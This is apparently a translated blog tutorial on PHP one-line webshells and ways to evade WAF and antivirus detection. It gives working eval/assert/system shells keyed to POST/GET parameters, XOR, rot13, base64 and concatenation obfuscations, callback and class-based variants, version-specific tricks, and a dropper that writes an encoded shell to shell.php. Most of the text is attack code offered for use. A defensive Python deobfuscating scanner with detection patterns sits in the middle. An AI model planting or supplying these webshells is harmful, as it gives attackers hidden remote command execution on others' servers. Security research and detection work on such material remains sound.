Mastering PHP One‑Line Webshell Evasion: Techniques & Payloads

This article explores various PHP one‑line webshell payloads, compares eval and assert functions, and presents multiple evasion techniques such as XOR, base64, rot13, string concatenation, variable obfuscation, and version‑specific tricks to bypass WAFs and antivirus detection.

MaGe Linux Operations

0X00 Simple One‑Line PHP Webshell (Applicable to CTFs and Small Sites)

<?php eval($_POST['a']); ?>
// Function substitution
<?php assert($_POST['a']); ?>
<?php @eval($_POST['110']);?>

The third form adds an @ to suppress error output; the @ can be placed before eval or before the POST variable.

Replacing eval with assert changes the behaviour: eval() executes a string as PHP code (the code must be terminated with a semicolon), while assert() evaluates an assertion and raises an assertion warning when it is false.

eval(): evaluates a string as PHP code; the string must be valid PHP and end with a semicolon.

assert(): evaluates an expression; if it is true nothing happens, otherwise an assertion error is raised. When given a string, assert() evaluates that string as PHP code, which is what makes it usable as an eval substitute (string arguments to assert() were deprecated in PHP 7.2 and are no longer evaluated as code in PHP 8.0).

Using assert in place of eval lowers the chance of a signature match, but many other sensitive tokens (system, $_POST, $_GET and so on) still stand out, so obfuscation and encoding are the usual next step.

One‑line PHP webshells can also execute commands via POST or GET, e.g.:

<body><? @system($_GET["calc"]); ?></body>

0X01 PHP Evasion (String Evasion Techniques)

This section covers four string‑level techniques: XOR encryption, base‑family encoding, rot13, and string concatenation.

PHP XOR Evasion

Many developers block sensitive functions via blacklists, but attackers can use encryption to bypass them. PHP's ^ operator applied to two strings XORs them byte by byte and returns a string, so a function name can be assembled from characters that never appear literally in the file.

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');
$___=$$__;
$_($___[_]);
?>

<?php
$_++;
$__ = ('`' ^ '?') . (':' ^ '}') . ('%' ^ '`') . ('{' ^ '/');
$___ = ('$' ^ '{') . ('~' ^ '.') . ('/' ^ '`') . ('-' ^ '~') . ('(' ^ '|');
('%05'^'`')
${$__}[!$_](${$___}[$_]);
?>

<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
?>

A small PHP script can enumerate which pairs of printable symbols XOR to a letter; that is how the function names in the payloads above are assembled.

<?php
// Enumerate every pair of printable symbols whose XOR is an ASCII letter.
$test = '~!@#$%^&*()_+\|/?.,-={}[]';
for($i=0;$i<strlen($test);$i++) {
    for($j=0;$j<strlen($test);$j++) {
        $c = ord($test[$i]^$test[$j]);
        // A-Z is 65..90 and a-z is 97..122; the original compared with > 97 and < 122,
        // which silently dropped 'a' and 'z'.
        if(($c>=65 && $c<=90) || ($c>=97 && $c<=122)) {
            echo $test[$i].'^'.$test[$j].'结果为:';
            echo $test[$i]^$test[$j];
            echo '<br>';
        }
    }
}
?>

PHP Base Family Encryption

<?php
$a = 'd2hvYW1p';
echo base64_decode($a);
?>

Base16 or Base32 can be combined with other methods for better evasion.

PHP rot13 Encryption

<?php
$a=str_rot13('riny');
$a($_POST['110']);
?>

rot13 encodes eval as riny, so the literal function name never appears in the file and simple regex filters miss it.

<?php
class A{
    function xxx($a){
        $b=str_rot13('!r!i!n!y!!');
        $str=explode('!',$b)[5];
        $str($a);
    }
}
$c=new A();
$c->xxx($_REQUEST['110']);
?>

PHP Concatenation Evasion

<?php $k="e"."v"."a"."l"; $k($_{"_PO"."ST"}['110']);?>

Splitting sensitive functions and reassembling them can evade detection.

<?php
$a = substr_replace("xxser","asser",-3);
$b = array('', $a);
$c = $b[1].chr('116');
$fun=preg_replace("/xx/", "", $c);
$d = substr_replace("", $fun,0);
$d($_POST['110']);
?>

PHP Obfuscation Evasion

<?php
function a() { return "/*110110110110*/".$_POST['110']."/*110110110110**/"; }
@eval(a());
?>
<?php $a = str_replace(x,"","xexaxvxlx"); $a(@$_POST["110"]); ?>

0X02 PHP Evasion (Function Feature Evasion)

This section covers function replacement, custom‑function bypass, deformed callbacks, array tricks, and variable variables.

Function Replacement

Common replaceable functions include array_map, array_filter, array_reduce, array_diff_uassoc, array_udiff, array_udiff_uassoc, array_intersect_assoc, array_uintersect, array_uintersect_uassoc, xml_set_character_data_handler, xml_set_default_handler, xml_set_external_entity_ref_handler, xml_set_notation_decl_handler, xml_set_unparsed_entity_decl_handler, etc.

Custom Function Bypass (Case‑Insensitive)

<?php
function aaa($a){ return $a; }
function bbb($b){ return eval($b); }
function post(){ return @$_POST['110']; }
function run(){ return aaa(bbb)(aaa(post)()); }
aaa(bbb)(aaa(post)());
?>

PHP function names are case‑insensitive; using different cases can help bypass filters.

Callback Combination Bypass

array_walk()
array_map()
filter_var()
filter_var_array()
uasort()
uksort()

These functions often need additional obfuscation to avoid detection.

Array Bypass

<?php
$a = substr_replace("evxx","al",2);
$b = array($arrayName = ($arrayName =($arrayName = array('a' => $b($_POST['110'])))));
?>

Variable Variables

<?php
$zeo='miansha';
$$zeo=$_POST['110'];
eval($miansha);
?>

Class‑Based Evasion

<?php
class zeo2 { public $b=''; function post(){ return $_POST['x']; } }
class zeo extends zeo2 { public $code=null; function __construct(){ $code=parent::post(); assert($code); } }
$blll = new zeo;
$bzzz = new zeo2;
?>
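As an added defender‑side example (not code from the article or from MaGe), the Python below folds the string tricks of the previous section (XOR of literals, str_rot13, base64_decode, and '.' concatenation) back into plaintext and then checks for the sensitive names those tricks hide, plus variable‑function or callback calls that are fed a superglobal as this section describes. The samples are constructed copies of the article's payloads, and the regexes assume the quoted‑literal forms used there.

```python
import base64, codecs, re

# Names worth a manual look once folding reveals them; taken from the article's payloads.
SENSITIVE = ("eval", "assert", "system", "_post", "_get", "_request")
_LIT = r"(?:'([^']*)'|\"([^\"]*)\")"  # one quoted literal; escaped quotes are not handled
XOR_RE = re.compile(r"\(\s*" + _LIT + r"\s*\^\s*" + _LIT + r"\s*\)")  # ('a' ^ 'b')
ROT_RE = re.compile(r"str_rot13\(\s*" + _LIT + r"\s*\)", re.I)        # str_rot13('riny')
B64_RE = re.compile(r"base64_decode\(\s*" + _LIT + r"\s*\)", re.I)    # base64_decode('..')
CAT_RE = re.compile(_LIT + r"\s*\.\s*" + _LIT)                        # 'e' . 'v'
# A variable function, or one of the article's callback functions, given a superglobal argument.
CALL_RE = re.compile(r"(?:\$\w+|array_map|array_filter|array_walk|array_reduce|uasort|uksort"
                     r"|filter_var|filter_var_array)\s*\([^;]*?\$\{?['\"]?_(?:POST|GET|REQUEST)\b")

def _lit(m, i):  # literal i (1-based) of a match built from _LIT, whichever quote style hit
    a, b = m.group(2 * i - 1), m.group(2 * i)
    return a if a is not None else (b or "")
def _q(s):  # re-emit a folded value as a PHP literal so the next pass can fold it further
    return "'" + s + "'" if "'" not in s else '"' + s + '"'
def _xor(a, b):  # PHP's string ^ : byte-wise XOR, truncated to the shorter operand
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))
def _b64(m):  # decode a base64 literal; leave the call untouched if it is not valid base64
    try:
        return _q(base64.b64decode(_lit(m, 1), validate=True).decode("latin-1"))
    except Exception:
        return m.group(0)

def fold(src):
    """Constant-fold XOR, str_rot13, base64_decode and '.' over literals until nothing changes."""
    prev = None
    while prev != src:
        prev = src
        src = XOR_RE.sub(lambda m: _q(_xor(_lit(m, 1), _lit(m, 2))), src)
        src = ROT_RE.sub(lambda m: _q(codecs.encode(_lit(m, 1), "rot_13")), src)
        src = B64_RE.sub(_b64, src)
        src = CAT_RE.sub(lambda m: _q(_lit(m, 1) + _lit(m, 2)), src)
    return src

def scan(src):
    """Report names visible in the raw source, names only folding reveals, and dynamic calls."""
    folded = fold(src)
    raw, low = src.lower(), folded.lower()
    return {"direct": sorted(n for n in SENSITIVE if n in raw),
            "revealed": sorted(n for n in SENSITIVE if n in low and n not in raw),
            "dynamic_calls": len(CALL_RE.findall(folded)), "folded": folded}

# Constructed samples modelled on the article's rot13, concatenation, base64 and XOR payloads.
SAMPLES = {
    "rot13": "<?php $a=str_rot13('riny'); $a($_POST['110']); ?>",
    "concat": "<?php $k=\"e\".\"v\".\"a\".\"l\"; $k(${\"_PO\".\"ST\"}['110']);?>",
    "base64": "<?php echo base64_decode('d2hvYW1p'); ?>",
    "xor": "<?php $__ = ('`' ^ '?') . (':' ^ '}') . ('%' ^ '`') . ('{' ^ '/'); ?>",
}
```

A file whose "revealed" list is non‑empty is one where a plain keyword signature would have missed the sensitive name; the "dynamic_calls" count flags the variable‑function shape shared by most payloads in this article.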

0X03 PHP Evasion (Version‑Specific Techniques)

1. Special Symbols to Trigger Errors

<?php \echo 'whoami'; ?>

Works only on PHP 5.2; using unusual whitespace or null characters can confuse signature‑based detection.

2. Hexadecimal Strings

<?php $s=substr("aabbccsystem","0x6"); $s(whoami); ?>

Effective on PHP 5.3/5.5; PHP 7 treats the string as non‑numeric.

3. Syntax Without Newlines (PHP 7.3.4)

<?php
$a = $_GET['function'] ?? 'whoami';
$b = $_GET['cmd'] ?? 'whoami';
$a(null.(null.$b));
?>

The null‑coalescing operator (??) exists only in PHP 7.0+; on older versions it is a parse error.

0X04 PHP One‑Line Evasion Examples

<?php
$file="shell.php";
$shell="PD9waHAKJGEgPSBzdWJzdHJfcmVwbGFjZSgieHhzZXIiLCJhc3NlciIsLTMpOwokYiA9IGFycmF5KCcnLCRhKTsKJGMgPSAkYlsxXS5jaHIoJzExNicpOwokZnVuPXByZWdfcmVwbGFjZSgiL3h4LyIsIiIsJGMpOwokZCA9IHN1YnN0cl9yZXBsYWNlKCIiLCRmdW4sMCk7CiRkICgkX1BPU1RbJzExMCddKTsKPz4=";
file_put_contents($file,base64_decode($shell));
?>
// password 110
<?php
ini_set("display_errors",1);
$objPQ = new SplPriorityQueue();
$objPQ->insert('m',1);
$objPQ->insert('s',6);
$objPQ->insert('e',3);
$objPQ->insert('s',4);
$objPQ->insert('y',5);
$objPQ->insert('t',$_GET[a]);
$objPQ->setExtractFlags(SplPriorityQueue::EXTR_DATA);
$objPQ->top();
$m='';
$cur = new ErrorException($_GET[b]);
while($objPQ->valid()){ $m.=$objPQ->current(); $objPQ->next(); }
echo $m($cur->getMessage());
?>
// key 3

0X05 One‑Line Evasion Summary

This article aims to give readers a solid understanding of one‑line PHP webshell evasion techniques; as detection becomes more aggressive, creative thinking and layered obfuscation are essential.
